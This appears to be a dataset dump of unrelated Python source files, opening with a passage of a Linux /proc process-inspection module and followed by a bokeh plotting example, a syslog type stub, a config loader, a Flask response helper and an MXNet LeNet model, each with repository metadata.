if err.errno in (errno.EPERM, errno.EACCES):
raise AccessDenied()
# ESRCH (no such process) can be raised on read() if
# process is gone in the meantime.
if err.errno == errno.ESRCH:
raise NoSuchProcess()
# ENOENT (no such file or directory) can be raised on open().
if err.errno == errno.ENOENT and not os.path.exists(
"%s/%s" % (self._procfs_path, self.pid)
):
raise NoSuchProcess()
# Note: zombies will keep existing under /proc until they're
# gone so there's no way to distinguish them in here.
raise
return wrapper
def boot_time():
"""Return the system boot time expressed in seconds since the epoch."""
global BOOT_TIME
path = "%s/stat" % get_procfs_path()
with open_binary(path) as f:
for line in f:
if line.startswith(b"btime"):
ret = float(line.strip().split()[1])
BOOT_TIME = ret
return ret
raise RuntimeError("line 'btime' not found in %s" % path)
class Process(object):
"""Linux process implementation."""
__slots__ = ["pid", "_name", "_ppid", "_procfs_path"]
def __init__(self, pid):
self.pid = pid
self._name = None
self._ppid = None
self._procfs_path = get_procfs_path()
@memoize_when_activated
def _parse_stat_file(self):
"""Parse /proc/{pid}/stat file. Return a list of fields where
process name is in position 0.
Using "man proc" as a reference: where "man proc" refers to
position N, always subtract 2 (e.g. starttime pos 22 in
'man proc' == pos 20 in the list returned here).
The return value is cached in case oneshot() ctx manager is
in use.
"""
with open_binary("%s/%s/stat" % (self._procfs_path, self.pid)) as f:
data = f.read()
# Process name is between parentheses. It can contain spaces and
# other parentheses. This is taken into account by looking for
# the first occurrence of "(" and the last occurrence of ")".
rpar = data.rfind(b")")
name = data[data.find(b"(") + 1 : rpar]
others = data[rpar + 2 :].split()
return [name] + others
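# Illustrative example: for data == b"1234 (tmux: server) S 1 ...", rpar indexes the
# last ")", so name == b"tmux: server" and others[0] is the state field (here b"S").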
@wrap_exceptions
def cmdline(self):
with open_text("%s/%s/cmdline" % (self._procfs_path, self.pid)) as f:
data = f.read()
if not data:
# may happen in case of zombie process
return []
sep = "\x00" if data.endswith("\x00") else " "
if data.endswith(sep):
data = data[:-1]
return [x for x in data.split(sep)]
@wrap_exceptions
def create_time(self):
values = self._parse_stat_file()
# According to documentation, starttime is in field 21 and the
# unit is jiffies (clock ticks).
# We first divide it for clock ticks and then add uptime returning
# seconds since the epoch, in UTC.
# Also use cached value if available.
bt = BOOT_TIME or boot_time()
return (float(values[20]) / CLOCK_TICKS) + bt
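# Illustrative arithmetic: with CLOCK_TICKS == 100 and a starttime field of 12345 ticks,
# the process started 123.45 seconds after boot, so create_time() returns
# boot_time() + 123.45 (seconds since the epoch).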
@wrap_exceptions
def memory_info(self):
# ============================================================
# | FIELD | DESCRIPTION | AKA | TOP |
# ============================================================
# | rss | resident set size | | RES |
# | vms | total program size | size | VIRT |
# | shared | shared pages (from shared mappings) | | SHR |
# | text | text ('code') | trs | CODE |
# | lib | library (unused in Linux 2.6) | lrs | |
# | data | data + stack | drs | DATA |
# | dirty | dirty pages (unused in Linux 2.6) | dt | |
# ============================================================
with open_binary("%s/%s/statm" % (self._procfs_path, self.pid)) as f:
vms, rss, shared, text, lib, data, dirty = [
int(x) * PAGESIZE for x in f.readline().split()[:7]
]
return pmem(rss, vms, shared, text, lib, data, dirty)
@wrap_exceptions
def cpu_times(self):
values = self._parse_stat_file()
utime = float(values[12]) / CLOCK_TICKS
stime = float(values[13]) / CLOCK_TICKS
children_utime = float(values[14]) / CLOCK_TICKS
children_stime = float(values[15]) / CLOCK_TICKS
return pcputimes(utime, stime, children_utime, children_stime)
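A minimal, Linux-only usage sketch for the module above; it assumes the parent kolibri.utils.pskolibri package is importable and defines PROCFS_PATH (normally "/proc"), which is what get_procfs_path() resolves.
import os
from kolibri.utils.pskolibri._pslinux import Process, cpu_times, virtual_memory

proc = Process(os.getpid())
print(proc.cmdline())             # argv of the current process
print(proc.memory_info().rss)     # resident set size in bytes
print(cpu_times().user, virtual_memory().used)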
| blob_id: 39491ca36706604b130735169f6e384f441266c3 | repo: bokeh/bokeh | path: /examples/topics/hierarchical/crosstab.py | licenses: BSD-3-Clause (permissive) | branch: refs/heads/branch-3.3 | revision_date: 2023-08-30T03:43:05 | language: Python | encoding: UTF-8 | length_bytes: 2,098 | filename: crosstab.py |
''' An adjacent bar plot of Pandas crosstab data.
.. bokeh-example-metadata::
:sampledata: sample_superstore
:apis: bokeh.plotting.figure.hbar, bokeh.models.sources.ColumnDataSource
:refs: :ref:`ug_topics_hierarchical_crosstab`
:keywords: hierarchical, crosstab
'''
import pandas as pd
from bokeh.core.properties import value
from bokeh.plotting import ColumnDataSource, figure, show
from bokeh.sampledata.sample_superstore import data as df
from bokeh.transform import cumsum, factor_cmap
rows = pd.crosstab(df.Category, df.Region, aggfunc='sum', values=df.Sales, normalize="index")
source = ColumnDataSource(rows.T)
cats = ["Office Supplies", "Furniture", "Technology"]
regions = source.data["Region"]
p = figure(y_range=cats, x_range=(-0.55, 1.02), height=400, width=700, tools="",
x_axis_location=None, toolbar_location=None, outline_line_color=None)
p.grid.grid_line_color = None
p.yaxis.fixed_location = 0
p.axis.major_tick_line_color = None
p.axis.major_label_text_color = None
p.axis.axis_line_color = "#4a4a4a"
p.axis.axis_line_width = 6
source.data["color"] = [ "#dadada","#dadada", "#4a4a4a", "#dadada"]
for y in cats:
left, right = cumsum(y, include_zero=True), cumsum(y)
p.hbar(y=value(y), left=left, right=right, source=source, height=0.9,
color=factor_cmap("Region", "MediumContrast4", regions))
pcts = source.data[y]
source.data[f"{y} text"] = [f"{r}\n{x*100:0.1f}%" for r, x in zip(regions, pcts)]
p.text(y=value(y), x=left, text=f"{y} text", source=source, x_offset=10,
text_color="color", text_baseline="middle", text_font_size="15px")
totals = pd.crosstab(df.Category, df.Region, margins=True, aggfunc='sum',
values=df.Sales, normalize="columns").All
p.hbar(right=0, left=-totals, y=totals.index, height=0.9, color="#dadada")
text = [f"{name} ({totals.loc[name]*100:0.1f}%)" for name in cats]
p.text(y=cats, x=0, text=text, text_baseline="middle", text_align="right",
x_offset=-12, text_color="#4a4a4a", text_font_size="20px",
text_font_style="bold")
show(p)
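A self-contained illustration of the pd.crosstab(..., normalize="index") call used above, with made-up numbers: each Category row of the resulting table sums to 1, which is what lets the cumulative sums act directly as bar extents.
import pandas as pd

toy = pd.DataFrame({
    "Category": ["Furniture", "Furniture", "Technology", "Technology"],
    "Region": ["East", "West", "East", "West"],
    "Sales": [100.0, 300.0, 250.0, 250.0],
})
shares = pd.crosstab(toy.Category, toy.Region, values=toy.Sales,
                     aggfunc="sum", normalize="index")
print(shares)              # Furniture: East 0.25, West 0.75; Technology: East 0.5, West 0.5
print(shares.sum(axis=1))  # every row sums to 1.0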
| blob_id: e74a29234ec4c5b900eb06217926843e04ee1183 | repo: JetBrains/intellij-community | path: /python/helpers/typeshed/stdlib/syslog.pyi | licenses: MIT, Apache-2.0 (permissive) | branch: refs/heads/master | revision_date: 2023-09-03T11:51:00 | language: Python | encoding: UTF-8 | length_bytes: 1,357 | filename: syslog.pyi |
import sys
from typing import overload
from typing_extensions import Literal
if sys.platform != "win32":
LOG_ALERT: Literal[1]
LOG_AUTH: Literal[32]
LOG_AUTHPRIV: Literal[80]
LOG_CONS: Literal[2]
LOG_CRIT: Literal[2]
LOG_CRON: Literal[72]
LOG_DAEMON: Literal[24]
LOG_DEBUG: Literal[7]
LOG_EMERG: Literal[0]
LOG_ERR: Literal[3]
LOG_INFO: Literal[6]
LOG_KERN: Literal[0]
LOG_LOCAL0: Literal[128]
LOG_LOCAL1: Literal[136]
LOG_LOCAL2: Literal[144]
LOG_LOCAL3: Literal[152]
LOG_LOCAL4: Literal[160]
LOG_LOCAL5: Literal[168]
LOG_LOCAL6: Literal[176]
LOG_LOCAL7: Literal[184]
LOG_LPR: Literal[48]
LOG_MAIL: Literal[16]
LOG_NDELAY: Literal[8]
LOG_NEWS: Literal[56]
LOG_NOTICE: Literal[5]
LOG_NOWAIT: Literal[16]
LOG_ODELAY: Literal[4]
LOG_PERROR: Literal[32]
LOG_PID: Literal[1]
LOG_SYSLOG: Literal[40]
LOG_USER: Literal[8]
LOG_UUCP: Literal[64]
LOG_WARNING: Literal[4]
def LOG_MASK(a: int) -> int: ...
def LOG_UPTO(a: int) -> int: ...
def closelog() -> None: ...
def openlog(ident: str = ..., logoption: int = ..., facility: int = ...) -> None: ...
def setlogmask(x: int) -> int: ...
@overload
def syslog(priority: int, message: str) -> None: ...
@overload
def syslog(message: str) -> None: ...
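A short usage sketch of the Unix-only API this stub describes (it will not run on Windows); the ident string and messages are examples.
import syslog

syslog.openlog(ident="myapp", logoption=syslog.LOG_PID, facility=syslog.LOG_USER)
syslog.setlogmask(syslog.LOG_UPTO(syslog.LOG_INFO))   # suppress LOG_DEBUG messages
syslog.syslog(syslog.LOG_WARNING, "disk usage above 90%")
syslog.syslog("single-argument form defaults to LOG_INFO priority")
syslog.closelog()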
| blob_id: 7a19a3dbe28dac8c9481a4f3e9c27b19512770e5 | repo: connorferster/handcalcs | path: /handcalcs/global_config.py | licenses: Apache-2.0 (permissive) | branch: refs/heads/main | revision_date: 2022-12-27T18:49:10 | language: Python | encoding: UTF-8 | length_bytes: 2,405 | filename: global_config.py |
# Copyright 2020 Connor Ferster
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from typing import Any
import pathlib
_config = {}
def _load_global_config(config_file_name: str):
with open(config_file_name, "r") as config_file:
_config_data = json.load(config_file)
return _config_data
_here = pathlib.Path(__file__).parent
_config_file = _here / "config.json"
_config = _load_global_config(_config_file)
_OPTIONS = []
for key, value in _config.items():
if isinstance(value, str):
str_value = f"'{value}'"
if "\n" in str_value:
str_value = str_value.replace("\n", "\\n")
else:
str_value = str(value)
_OPTIONS.append(f"{key} -> {type(value)} (default = {str_value})")
# _OPTIONS = [f"{key} -> {type(value)} (default = {value})" for key, value in _config.items()]
_OPTIONS_TEXT = "Configuration can be set on the following options:\n\t" + "\n\t".join(
_OPTIONS
)
def set_option(option: str, value: Any) -> None:
if option in _config and isinstance(value, type(_config[option])):
_config[option] = value
elif option in _config and not isinstance(value, type(_config[option])):
raise ValueError(
f"Option, {option}, must be set with a value of type {type(_config[option])},"
f" not {type(value)}."
)
else:
raise ValueError(f"{option} is not a valid option that can be set.")
def save_config() -> None:
"""
Returns None. Saves the current global configuration as the default configuration
that will be loaded upon module import.
"""
with open(_config_file, "w", newline="") as config_file:
json.dump(_config, config_file, indent=4)
config_file.truncate()
set_option.__doc__ = f"""
Returns None. Sets the value of 'option' to 'value' in the global config.
{_OPTIONS_TEXT}
"""
| blob_id: 3d5dd9de735d71d2ca724eb2c7f4c7bef321d5ec | repo: deepfence/ThreatMapper | path: /deepfence_backend/utils/response.py | licenses: Apache-2.0 (permissive) | branch: refs/heads/main | revision_date: 2023-03-02T00:49:57 | language: Python | encoding: UTF-8 | length_bytes: 521 | filename: response.py |
from flask import jsonify
def set_response(data=None, error=None, status=200, headers=None):
response = format_response(data=data, error=error, status=status)
if headers:
return jsonify(response), status, headers
return jsonify(response), status
def format_response(data=None, error=None, status=200):
if 200 <= status < 400:
code = True
else:
code = False
response = {
'data': data,
'success': code,
'error': error
}
return response
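A minimal sketch of using these helpers inside a Flask view; the app and routes are illustrative only.
from flask import Flask

app = Flask(__name__)

@app.route("/health")
def health():
    # -> {"data": {"status": "ok"}, "success": true, "error": null} with HTTP 200
    return set_response(data={"status": "ok"})

@app.route("/missing")
def missing():
    return set_response(error="resource not found", status=404)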
| blob_id: cabc2f3bdbb368486ca3bd279137795b109117be | repo: NVIDIA/DALI | path: /docs/examples/use_cases/mxnet/resnetn/symbols/lenet.py | licenses: Apache-2.0 (permissive) | branch: refs/heads/main | revision_date: 2023-09-01T13:45:03 | language: Python | encoding: UTF-8 | length_bytes: 2,957 | filename: lenet.py |
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
LeCun, Yann, Leon Bottou, Yoshua Bengio, and Patrick Haffner.
Gradient-based learning applied to document recognition.
Proceedings of the IEEE (1998)
"""
import mxnet as mx
def get_loc(data, attr={'lr_mult':'0.01'}):
"""
The localisation network in lenet-stn; it improves accuracy by roughly 1% or more
when num-epoch >= 15.
"""
loc = mx.symbol.Convolution(data=data, num_filter=30, kernel=(5, 5), stride=(2,2))
loc = mx.symbol.Activation(data = loc, act_type='relu')
loc = mx.symbol.Pooling(data=loc, kernel=(2, 2), stride=(2, 2), pool_type='max')
loc = mx.symbol.Convolution(data=loc, num_filter=60, kernel=(3, 3), stride=(1,1), pad=(1, 1))
loc = mx.symbol.Activation(data = loc, act_type='relu')
loc = mx.symbol.Pooling(data=loc, global_pool=True, kernel=(2, 2), pool_type='avg')
loc = mx.symbol.Flatten(data=loc)
loc = mx.symbol.FullyConnected(data=loc, num_hidden=6, name="stn_loc", attr=attr)
return loc
def get_symbol(num_classes=10, add_stn=False, **kwargs):
data = mx.symbol.Variable('data')
if add_stn:
data = mx.sym.SpatialTransformer(data=data, loc=get_loc(data), target_shape = (28,28),
transform_type="affine", sampler_type="bilinear")
# first conv
conv1 = mx.symbol.Convolution(data=data, kernel=(5,5), num_filter=20)
tanh1 = mx.symbol.Activation(data=conv1, act_type="tanh")
pool1 = mx.symbol.Pooling(data=tanh1, pool_type="max",
kernel=(2,2), stride=(2,2))
# second conv
conv2 = mx.symbol.Convolution(data=pool1, kernel=(5,5), num_filter=50)
tanh2 = mx.symbol.Activation(data=conv2, act_type="tanh")
pool2 = mx.symbol.Pooling(data=tanh2, pool_type="max",
kernel=(2,2), stride=(2,2))
# first fullc
flatten = mx.symbol.Flatten(data=pool2)
fc1 = mx.symbol.FullyConnected(data=flatten, num_hidden=500)
tanh3 = mx.symbol.Activation(data=fc1, act_type="tanh")
# second fullc
fc2 = mx.symbol.FullyConnected(data=tanh3, num_hidden=num_classes)
# loss
lenet = mx.symbol.SoftmaxOutput(data=fc2, name='softmax')
return lenet
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.